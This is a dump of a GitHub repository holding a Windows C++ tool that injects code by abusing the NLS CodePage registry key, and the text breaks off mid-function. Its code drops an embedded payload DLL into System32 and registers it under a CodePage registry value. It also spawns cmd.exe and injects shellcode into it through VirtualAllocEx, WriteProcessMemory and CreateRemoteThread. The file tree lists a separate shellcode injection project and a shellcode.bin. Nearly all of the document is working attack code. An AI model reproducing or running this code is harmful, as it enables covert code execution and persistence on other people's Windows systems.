├── .gitattributes ├── .gitignore ├── NLSRegistryCodeInjection.sln ├── NLSRegistryCodeInjection ├── NLSRegistryCodeInjection.aps ├── NLSRegistryCodeInjection.cpp ├── NLSRegistryCodeInjection.rc ├── NLSRegistryCodeInjection.vcxproj ├── NLSRegistryCodeInjection.vcxproj.filters ├── NLSRegistryCodeInjection.vcxproj.user ├── PayloadDll.dll ├── headers.hpp ├── payload.cpp ├── payload.hpp └── resource1.h ├── README.md └── ShellcodeInjection ├── ShellcodeInjection.asm ├── ShellcodeInjection.cpp ├── ShellcodeInjection.obj ├── ShellcodeInjection.vcxproj ├── ShellcodeInjection.vcxproj.filters ├── ShellcodeInjection.vcxproj.user ├── all sections └── shellcode.bin ├── defs.h ├── mllink$.lnk └── x64 └── Release ├── ShellcodeInjection.Build.CppClean.log ├── ShellcodeInjection.exe.recipe ├── ShellcodeInjection.log └── ShellcodeInjection.vcxproj.FileListAbsolute.txt /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/CL.command.1.tlog 3 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/CL.read.1.tlog 4 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/CL.write.1.tlog 5 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/link.command.1.tlog 6 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/link.read.1.tlog 7 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/link.write.1.tlog 8 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/NLSRegistryCodeInjection.lastbuildstate 9 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/rc.command.1.tlog 10 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/rc.read.1.tlog 11 | NLSRegistryCodeInjection/x64/Debug/NLSRegis.97c68020.tlog/rc.write.1.tlog 12 | NLSRegistryCodeInjection/x64/Debug/NLSRegistryCodeInjection.exe.recipe 13 | NLSRegistryCodeInjection/x64/Debug/NLSRegistryCodeInjection.ilk 14 | NLSRegistryCodeInjection/x64/Debug/NLSRegistryCodeInjection.log 15 | NLSRegistryCodeInjection/x64/Debug/NLSRegistryCodeInjection.obj 16 | NLSRegistryCodeInjection/x64/Debug/NLSRegistryCodeInjection.res 17 | NLSRegistryCodeInjection/x64/Debug/payload.obj 18 | NLSRegistryCodeInjection/x64/Debug/vc143.idb 19 | NLSRegistryCodeInjection/x64/Debug/vc143.pdb 20 | x64/Debug/NLSRegistryCodeInjection.exe 21 | x64/Debug/NLSRegistryCodeInjection.pdb 22 | .vs/NLSRegistryCodeInjection/v17/Solution.VC.db 23 | .vs/NLSRegistryCodeInjection/project-colors.json 24 | .vs/NLSRegistryCodeInjection/v17/.suo 25 | .vs/NLSRegistryCodeInjection/v17/Browse.VC.db 26 | .vs/NLSRegistryCodeInjection/v17/Browse.VC.db-shm 27 | .vs/NLSRegistryCodeInjection/v17/Browse.VC.db-wal 28 | .vs/NLSRegistryCodeInjection/v17/Browse.VC.opendb 29 | .vs/NLSRegistryCodeInjection/v17/ipch/AutoPCH/5381e99c08273369/PAYLOAD.ipch 30 | .vs/NLSRegistryCodeInjection/v17/ipch/AutoPCH/bd9db43f0c603519/NLSREGISTRYCODEINJECTION.ipch 31 | .vs/NLSRegistryCodeInjection/v17/Solution.VC.db-shm 32 | .vs/NLSRegistryCodeInjection/v17/Solution.VC.db-wal 33 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/CL.command.1.tlog 34 | x64/Debug/ShellcodeInjection.pdb 35 | ShellcodeInjection/x64/Debug/vc143.pdb 36 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/CL.read.1.tlog 37 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/CL.write.1.tlog 38 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/link.command.1.tlog 39 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/link.read.1.tlog 40 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/link.write.1.tlog 41 | ShellcodeInjection/x64/Debug/Shellcod.4225c8d1.tlog/ShellcodeInjection.lastbuildstate 42 | ShellcodeInjection/x64/Debug/ShellcodeInjection.exe.recipe 43 | ShellcodeInjection/x64/Debug/ShellcodeInjection.ilk 44 | ShellcodeInjection/x64/Debug/ShellcodeInjection.log 45 | ShellcodeInjection/x64/Debug/ShellcodeInjection.obj 46 | ShellcodeInjection/x64/Debug/vc143.idb 47 | x64/Debug/ShellcodeInjection.exe 48 | .vs/NLSRegistryCodeInjection/v17/ipch/AutoPCH/9c904366e5e24bf3/PAYLOAD.ipch 49 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/CL.command.1.tlog 50 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/CL.read.1.tlog 51 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/link.command.1.tlog 52 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/link.write.1.tlog 53 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/NLSRegistryCodeInjection.lastbuildstate 54 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/rc.command.1.tlog 55 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/rc.read.1.tlog 56 | NLSRegistryCodeInjection/x64/Release/NLSRegis.97c68020.tlog/rc.write.1.tlog 57 | NLSRegistryCodeInjection/x64/Release/NLSRegistryCodeInjection.iobj 58 | NLSRegistryCodeInjection/x64/Release/NLSRegistryCodeInjection.ipdb 59 | NLSRegistryCodeInjection/x64/Release/NLSRegistryCodeInjection.obj 60 | NLSRegistryCodeInjection/x64/Release/NLSRegistryCodeInjection.res 61 | NLSRegistryCodeInjection/x64/Release/payload.obj 62 | NLSRegistryCodeInjection/x64/Release/vc143.pdb 63 | x64/Release/NLSRegistryCodeInjection.exe 64 | x64/Release/NLSRegistryCodeInjection.pdb 65 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.0.32002.185 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NLSRegistryCodeInjection", "NLSRegistryCodeInjection\NLSRegistryCodeInjection.vcxproj", "{97C68020-174C-46C3-ABED-A71AC954AF56}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ShellcodeInjection", "ShellcodeInjection\ShellcodeInjection.vcxproj", "{4225C8D1-E331-4436-BA0C-4F8051B8CBDF}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Debug|x64.ActiveCfg = Debug|x64 19 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Debug|x64.Build.0 = Debug|x64 20 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Debug|x86.ActiveCfg = Debug|Win32 21 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Debug|x86.Build.0 = Debug|Win32 22 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Release|x64.ActiveCfg = Release|x64 23 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Release|x64.Build.0 = Release|x64 24 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Release|x86.ActiveCfg = Release|Win32 25 | {97C68020-174C-46C3-ABED-A71AC954AF56}.Release|x86.Build.0 = Release|Win32 26 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Debug|x64.ActiveCfg = Debug|x64 27 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Debug|x64.Build.0 = Debug|x64 28 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Debug|x86.ActiveCfg = Debug|Win32 29 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Debug|x86.Build.0 = Debug|Win32 30 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Release|x64.ActiveCfg = Release|x64 31 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Release|x64.Build.0 = Release|x64 32 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Release|x86.ActiveCfg = Release|Win32 33 | {4225C8D1-E331-4436-BA0C-4F8051B8CBDF}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | GlobalSection(ExtensibilityGlobals) = postSolution 39 | SolutionGuid = {1249E4BF-71B7-41C3-A888-72271D162739} 40 | EndGlobalSection 41 | EndGlobal 42 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/NLSRegistryCodeInjection.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/NLSRegistryCodeInjection/NLSRegistryCodeInjection.aps -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/NLSRegistryCodeInjection.cpp: -------------------------------------------------------------------------------- 1 | #include "payload.hpp" 2 | #include "headers.hpp" 3 | 4 | //Pending: Make initializer_list cleaner 5 | uint32_t main(void) 6 | { 7 | std::initializer_list list = { L"SYSTEM\\ControlSet001\\Control\\Nls\\CodePage", L"Payload.dll" , L""}; 8 | auto regObj = std::make_unique(list); 9 | if (OpenKeyForNlsModification(regObj.get())) 10 | { 11 | #ifdef DEBUG 12 | std::printf("Key has been modified, now preparing for injection\n"); 13 | #endif 14 | std::printf("Payload executed sucessfully :)\n"); 15 | system("pause"); 16 | } 17 | 18 | return EXIT_SUCCESS; 19 | } -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/NLSRegistryCodeInjection.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/NLSRegistryCodeInjection/NLSRegistryCodeInjection.rc -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/NLSRegistryCodeInjection.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {97c68020-174c-46c3-abed-a71ac954af56} 25 | NLSRegistryCodeInjection 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | stdcpp20 120 | 121 | 122 | Console 123 | true 124 | RequireAdministrator 125 | 126 | 127 | 128 | 129 | Level3 130 | true 131 | true 132 | true 133 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 134 | true 135 | stdcpp20 136 | Disabled 137 | 138 | 139 | Console 140 | true 141 | true 142 | true 143 | RequireAdministrator 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/NLSRegistryCodeInjection.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Archivos de origen 20 | 21 | 22 | Archivos de origen 23 | 24 | 25 | 26 | 27 | Archivos de encabezado 28 | 29 | 30 | Archivos de encabezado 31 | 32 | 33 | Archivos de encabezado 34 | 35 | 36 | 37 | 38 | Archivos de recursos 39 | 40 | 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/NLSRegistryCodeInjection.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/PayloadDll.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/NLSRegistryCodeInjection/PayloadDll.dll -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/headers.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #define MAX_STRING_VALUES 3 11 | #define MAX_LENGTH_PATH 200 12 | 13 | enum class Index : uint32_t 14 | { 15 | SUBKEY_KEY_VALUE, 16 | DLL_NAME, 17 | FULL_PAYLOAD_DLL_PATH 18 | }; 19 | 20 | enum class CodePageIDIndex : uint32_t 21 | { 22 | CodePageInt, 23 | CodePageHex 24 | }; 25 | 26 | struct IndexingStringValues 27 | { 28 | std::wstring StringValues[MAX_STRING_VALUES]; 29 | Index IDs[MAX_STRING_VALUES]; 30 | }; 31 | 32 | class ShellcodeInjector { 33 | public: 34 | //Methods 35 | //1.-Create memory and write memory in other process. Allocate contiguous buffer for pointers to the virtual addresses. 36 | ShellcodeInjector() { 37 | 38 | } 39 | //Create And Write Memory. 40 | //void CreateAndWriteMemory(HANDLE hProcess, ) {} 41 | //2.-Execute thread based on member. 42 | 43 | private: 44 | void** m_pBlocksMemory; 45 | uint32_t m_numberOfBlocks; 46 | }; 47 | 48 | 49 | 50 | typedef class RegistryManipulation 51 | { 52 | public: 53 | RegistryManipulation(std::initializer_list l) 54 | { 55 | assert(l.size() <= MAX_STRING_VALUES); 56 | for (auto [i, j] = std::tuple{ 0, l.begin() }; i < l.size(); i++, j++) 57 | { 58 | keyValues.StringValues[i] = *j; 59 | keyValues.IDs[i] = static_cast(i); 60 | } 61 | hSubkeyNls = NULL; 62 | m_CodePageIdHex = NULL; 63 | m_CodePageIdInt = NULL; 64 | ZeroMemory(&m_procInfo, sizeof(PROCESS_INFORMATION)); 65 | } 66 | const wchar_t* getStringBuffer(Index i) { 67 | for (auto index : keyValues.IDs) { 68 | if (i == index) { 69 | return keyValues.StringValues[static_cast(i)].c_str(); 70 | } 71 | } 72 | return nullptr; 73 | } 74 | bool compareStringEqual(Index i, std::wstring_view s) { 75 | for (auto index : keyValues.IDs){ 76 | if (i == index) { 77 | return keyValues.StringValues[static_cast(i)].compare(s) == 0; 78 | } 79 | } 80 | return false; 81 | } 82 | void setStringBuffer(wchar_t* str, Index index) { 83 | for (auto i : keyValues.IDs) { 84 | if (i == index) { 85 | keyValues.StringValues[static_cast(i)] = str; 86 | } 87 | } 88 | } 89 | size_t getStringSize(Index i) { 90 | for (auto index : keyValues.IDs) { 91 | if (i == index) { 92 | return keyValues.StringValues[static_cast(i)].size() * sizeof(wchar_t); 93 | } 94 | } 95 | return NULL; 96 | } 97 | void setCodePageID(uint32_t id, CodePageIDIndex i){ 98 | switch (i){ 99 | case CodePageIDIndex::CodePageInt: { 100 | m_CodePageIdInt = id; 101 | break; 102 | } 103 | case CodePageIDIndex::CodePageHex: 104 | { 105 | m_CodePageIdHex = id; 106 | break; 107 | } 108 | default: 109 | { 110 | std::printf("Invalid option for setting m_CodePage\n"); 111 | return; 112 | } 113 | } 114 | } 115 | uint32_t getCodePageID(CodePageIDIndex i){ 116 | switch (i){ 117 | case CodePageIDIndex::CodePageInt: 118 | { 119 | return m_CodePageIdInt; 120 | } 121 | case CodePageIDIndex::CodePageHex: 122 | { 123 | return m_CodePageIdHex; 124 | } 125 | default: 126 | { 127 | std::printf("Invalid option for setting m_CodePage\n"); 128 | return NULL; 129 | } 130 | } 131 | } 132 | ~RegistryManipulation() { 133 | for (auto key : keyValues.StringValues) { 134 | key = L""; 135 | } 136 | RegCloseKey(hSubkeyNls); 137 | hSubkeyNls = NULL; 138 | ZeroMemory(&m_procInfo, sizeof(PROCESS_INFORMATION)); 139 | } 140 | 141 | //public members: 142 | HKEY hSubkeyNls; 143 | PROCESS_INFORMATION m_procInfo; 144 | private: 145 | //Same for this one. 146 | IndexingStringValues keyValues; 147 | uint32_t m_CodePageIdHex, m_CodePageIdInt; 148 | //This can be passed as inheritance probably. 149 | ShellcodeInjector injector; 150 | }*PRegistryKey; 151 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/payload.cpp: -------------------------------------------------------------------------------- 1 | #include "headers.hpp" 2 | #include "payload.hpp" 3 | #include "strsafe.h" 4 | #include "payload.hpp" 5 | #include "resource1.h" 6 | #define MAX_SIZE_DATA 260 7 | 8 | //IMPLEMENTED IT two different functions for convertion. 9 | UINT StringToIntDecimal(PWCHAR str) noexcept 10 | { 11 | uint32_t num = _wtoi(str); 12 | return num; 13 | } 14 | UINT StringToInt(PWCHAR str) noexcept { 15 | 16 | wchar_t chrSubkey, chr, * j; 17 | UINT i; 18 | j = str; 19 | chrSubkey = *str; 20 | for (i = 0; *j; chrSubkey = *j) 21 | { 22 | ++j; 23 | if ((chrSubkey - 0x41) > 5u) 24 | { 25 | if ((chrSubkey - 0x30) > 9u) 26 | { 27 | if ((chrSubkey - 0x61) > 5u) 28 | return i; 29 | chr = chrSubkey - 87; 30 | } 31 | else 32 | { 33 | chr = chrSubkey - 0x30; 34 | } 35 | } 36 | else 37 | { 38 | chr = chrSubkey - 55; 39 | } 40 | i = chr + 16 * i; 41 | } 42 | return i; 43 | } 44 | BOOLEAN CompareLastElementString(PWCHAR str1, PWCHAR str2, BOOLEAN CaseInsensitive) 45 | { 46 | bool bResult = false; 47 | //Has to find .dll somewhere, in the substring, otherwise doesnt exist. 48 | wchar_t* dll = wcsstr(str1, str2); 49 | if (dll != nullptr) { 50 | bResult = true; 51 | } 52 | return bResult; 53 | } 54 | bool FindCodePageWithPayload(PRegistryKey regObject, UINT dwValuesCount, UINT dwMaxLenValues){ 55 | DWORD dwCountName = 0, typeData, ValueDataSize = 0; 56 | //uint32_t CodePageInt; 57 | WCHAR CodePageID[MAX_PATH], ValueData[MAX_SIZE_DATA]; 58 | bool bResult = false; 59 | 60 | for (UINT i = 0; i < dwValuesCount; i++) { 61 | dwCountName = 260; 62 | ValueDataSize = 260; 63 | LSTATUS status = RegEnumValueW(regObject->hSubkeyNls, i, CodePageID, &dwCountName, nullptr, &typeData, (BYTE*)&ValueData, 64 | &ValueDataSize); 65 | if (status != ERROR_SUCCESS && GetLastError() != ERROR_ALREADY_EXISTS) 66 | { 67 | std::wprintf(L"Could not query Code Page ID %s, Last error: [%x]\n", CodePageID, GetLastError()); 68 | continue; 69 | } 70 | #ifdef _DEBUG 71 | std::wprintf(L"Iterating: %d - %s = %s\n", i, CodePageID, ValueData); 72 | #endif 73 | if (typeData == REG_SZ && regObject->compareStringEqual(Index::DLL_NAME, ValueData)){ 74 | #ifdef _DEBUG 75 | std::wprintf(L"Payload value has been found!: %d - %s = %s\n", i, CodePageID, ValueData); 76 | #endif 77 | uint32_t strHex = std::stoull(CodePageID, nullptr, 10); 78 | uint32_t strDecimal = std::stoull(CodePageID, nullptr, 16); 79 | regObject->setCodePageID(strHex, CodePageIDIndex::CodePageInt); 80 | regObject->setCodePageID(strDecimal, CodePageIDIndex::CodePageHex); 81 | std::wprintf(L"Values: CodepageHex = %d, CodePageInt = 0x%x\n", strDecimal, strHex); 82 | bResult = true; 83 | break; 84 | } 85 | } 86 | return bResult; 87 | } 88 | 89 | bool IterateCodePageAndExtractProperId(PRegistryKey regObject) { 90 | DWORD dwMaxLenValues, dwCountName = 0, dwValuesCount, typeData, ValueDataSize = 0; 91 | uint32_t CodePageInt = NULL, posCount = NULL; 92 | bool correctRet = false; 93 | LSTATUS status; 94 | WCHAR CodePageID[MAX_PATH], ValueData[MAX_SIZE_DATA]; 95 | 96 | //Queries information for the NLS subkey, mostly related to the values, which is the part that interests us the most. 97 | if (::RegQueryInfoKeyW(regObject->hSubkeyNls, nullptr, nullptr, nullptr, 98 | nullptr, nullptr, nullptr, &dwValuesCount, &dwMaxLenValues, nullptr, nullptr, nullptr)) 99 | { 100 | std::cerr << "Could not query information for the key, last error is: " << GetLastError() << "\n"; 101 | return correctRet; 102 | } 103 | //Only one failing, lets fix it. 104 | if (FindCodePageWithPayload(regObject, dwValuesCount, dwMaxLenValues)){ 105 | correctRet = true; 106 | return correctRet; 107 | } 108 | //Find one with .dll, then from there increase one until it works out. 109 | for (UINT i = 0; i < dwValuesCount; i++) { 110 | dwCountName = 260; 111 | ValueDataSize = 260; 112 | status = RegEnumValueW(regObject->hSubkeyNls, i, CodePageID, &dwCountName, nullptr, &typeData, (BYTE*)&ValueData, 113 | &ValueDataSize); 114 | if ((status != EXIT_SUCCESS) && (GetLastError() != ERROR_ALREADY_EXISTS)) 115 | { 116 | std::wprintf(L"Could not query Code Page ID %s, Last error: [%x]\n", CodePageID, status); 117 | continue; 118 | } 119 | #ifdef _DEBUG 120 | std::wprintf(L"Querying value i: %d, %s = %s\n", i, CodePageID, ValueData); 121 | #endif 122 | if (typeData == REG_SZ && CompareLastElementString(ValueData, const_cast(L".dll"), FALSE)) 123 | { 124 | #ifdef _DEBUG 125 | std::wprintf(L"Value with dll found in i = %d, %s = %s\n", i, CodePageID, ValueData); 126 | //Convert from str to hex 127 | CodePageInt = StringToInt(CodePageID); 128 | std::wprintf(L"Code page as int is: %x\n", CodePageInt); 129 | #endif // _DEBUG 130 | CodePageInt = StringToInt(CodePageID); 131 | posCount = i; 132 | break; 133 | } 134 | } 135 | if (CodePageInt == NULL) { 136 | std::printf("Could not find apropiate dll extension inside one of the subvalues\n"); 137 | return correctRet; 138 | } 139 | //FIX THIS CODE, WHEN PRINTING THERE IS SOMETHING THAT GOES WRONG. 140 | CodePageInt += 1; 141 | for (UINT i = 0; i < dwValuesCount - posCount; i++) { 142 | //2.Then we proceed to check if the code page ID value exists, if it doesnt, we create it and set the data. 143 | if (SUCCEEDED(StringCchPrintfW(ValueData, MAX_SIZE_DATA, L"%04x", CodePageInt))) 144 | { 145 | std::printf("Trying to create in CodePage ID %x\n", CodePageInt); 146 | } 147 | status = RegQueryValueEx(regObject->hSubkeyNls, ValueData, NULL, NULL, NULL, NULL); 148 | if (status != ERROR_SUCCESS && status == ERROR_FILE_NOT_FOUND) 149 | { 150 | if (!RegSetValueExW(regObject->hSubkeyNls, ValueData, NULL, REG_SZ, (BYTE*)regObject->getStringBuffer(Index::DLL_NAME), 151 | regObject->getStringSize(Index::DLL_NAME))) 152 | { 153 | //std::wprintf(L"The string value of the data is: %s\n", ValueData); 154 | uint32_t CodePageDecimal = StringToIntDecimal(ValueData); 155 | std::printf("Sucessfully created dll payload in CodePage ID %x\n", CodePageInt); 156 | regObject->setCodePageID(CodePageInt, CodePageIDIndex::CodePageHex); 157 | regObject->setCodePageID(CodePageDecimal, CodePageIDIndex::CodePageInt); 158 | std::wprintf(L"Values: CodepageHex = %d, CodePageInt = 0x%x\n", CodePageInt, CodePageDecimal); 159 | correctRet = true; 160 | break; 161 | } 162 | } 163 | CodePageInt += 1; 164 | } 165 | return correctRet; 166 | } 167 | 168 | bool CreateProcessToInject(LPPROCESS_INFORMATION procInfo) { 169 | STARTUPINFOW infoProc; 170 | //PROCESS_INFORMATION processInfo; 171 | ZeroMemory(&infoProc, sizeof(infoProc)); 172 | infoProc.cb = sizeof(infoProc); 173 | ZeroMemory(procInfo, sizeof(procInfo)); 174 | wchar_t path[MAX_PATH]; 175 | GetSystemDirectoryW(path, MAX_PATH); 176 | wcscat_s(path, MAX_PATH, L"\\cmd.exe"); 177 | return CreateProcessW(NULL, path, NULL, NULL, false, CREATE_NEW_CONSOLE, NULL, NULL, &infoProc, procInfo) != NULL; 178 | } 179 | 180 | bool DropSystemDllPayload(PRegistryKey regObject) { 181 | HMODULE hMod = GetModuleHandleA(NULL); 182 | HRSRC hResource = FindResource(hMod, MAKEINTRESOURCE(IDR_RT_RCDATA1), L"RT_RCDATA"); 183 | if (hResource == NULL) 184 | { 185 | printf("Could not find the payload dll resource, exiting...\n"); 186 | return false; 187 | } 188 | DWORD dwSizeResource = SizeofResource(hMod, hResource); 189 | HGLOBAL hResLoaded = LoadResource(hMod, hResource); 190 | if (hResLoaded == NULL) 191 | { 192 | printf("Could not find the dll, exiting...\n"); 193 | return false; 194 | } 195 | auto pBuffer = static_cast (LockResource(hResLoaded)); 196 | LPWSTR pathPayload = new wchar_t[MAX_PATH]; 197 | GetSystemDirectoryW(pathPayload, MAX_PATH); 198 | wcscat_s(pathPayload, MAX_PATH, L"\\"); 199 | wcscat_s(pathPayload, MAX_PATH, regObject->getStringBuffer(Index::DLL_NAME)); 200 | regObject->setStringBuffer(pathPayload, Index::FULL_PAYLOAD_DLL_PATH); 201 | HANDLE hFile = CreateFileW(pathPayload, GENERIC_ALL, FILE_SHARE_DELETE, 202 | NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, nullptr); 203 | delete[] pathPayload; 204 | if (hFile == INVALID_HANDLE_VALUE) 205 | { 206 | if (GetLastError() == ERROR_FILE_EXISTS){ 207 | std::printf("File already exists, trying to set up registry.\n"); 208 | return true; 209 | } 210 | std::printf("Could not obtain HANDLE to the newly created FILE, last error is %d\n", GetLastError()); 211 | return false; 212 | } 213 | DWORD dwNumberBytesWritten; 214 | if (!WriteFile(hFile, pBuffer, dwSizeResource, &dwNumberBytesWritten, nullptr)) 215 | { 216 | std::printf("Could not write to file, last error is %d\n", GetLastError()); 217 | CloseHandle(hFile); 218 | return false; 219 | } 220 | CloseHandle(hFile); 221 | return true; 222 | } 223 | 224 | void SelfSpawnPayload(DWORD dwCodePageId) 225 | { 226 | if (!GetConsoleWindow()) 227 | { 228 | if (!AllocConsole()) { 229 | return; 230 | } 231 | } 232 | if (!SetConsoleOutputCP(dwCodePageId)) { 233 | std::printf("Could not self test injection in SetConsoleOutputCP, last error is: 0x%x\n", GetLastError()); 234 | return; 235 | } 236 | if (!SetConsoleCP(dwCodePageId)) { 237 | std::printf("Could not self test for SetConsoleCp: Last error is 0x%x\n", GetLastError()); 238 | return; 239 | } 240 | SetThreadUILanguage(0); 241 | } 242 | 243 | void InjectStagerToPayload(PRegistryKey regObject) { 244 | LPVOID lpCodePageID = (LPVOID)VirtualAllocEx(regObject->m_procInfo.hProcess, NULL, sizeof(DWORD), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 245 | if (lpCodePageID == nullptr) { 246 | std::printf("Could not allocate buffer in remote process\n"); 247 | return; 248 | } 249 | DWORD codePageID = regObject->getCodePageID(CodePageIDIndex::CodePageInt); 250 | if (!WriteProcessMemory(regObject->m_procInfo.hProcess, lpCodePageID, &codePageID, sizeof(DWORD), NULL)) { 251 | std::printf("Could not create write memory with codePageID to inject\n"); 252 | return; 253 | } 254 | //Alloc and write shellcode, easiest way is VirtualAllocEx + WPM, but we have to pass arg, so I am not so sure how I am going to do that... 255 | LPVOID ShellcodeMemory = (LPVOID)VirtualAllocEx(regObject->m_procInfo.hProcess, NULL, lengthInject, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 256 | if (ShellcodeMemory == nullptr) { 257 | std::printf("Could not allocate buffer in remote process\n"); 258 | return; 259 | } 260 | //This will write the payload in the remote process. 261 | if (!WriteProcessMemory(regObject->m_procInfo.hProcess, ShellcodeMemory, &StubInject, lengthInject, NULL)) { 262 | std::printf("Could not create write memory with codePageID to inject\n"); 263 | return; 264 | } 265 | //Need to change protection to EXECUTE_READ. 266 | DWORD dwProtection; 267 | if (!VirtualProtectEx(regObject->m_procInfo.hProcess, ShellcodeMemory, lengthInject, PAGE_EXECUTE_READ, &dwProtection)) { 268 | std::printf("Could not change protection of memory for shellcode injection. Last error is 0x%x\n", GetLastError()); 269 | return; 270 | } 271 | HANDLE hThread = CreateRemoteThread(regObject->m_procInfo.hProcess, 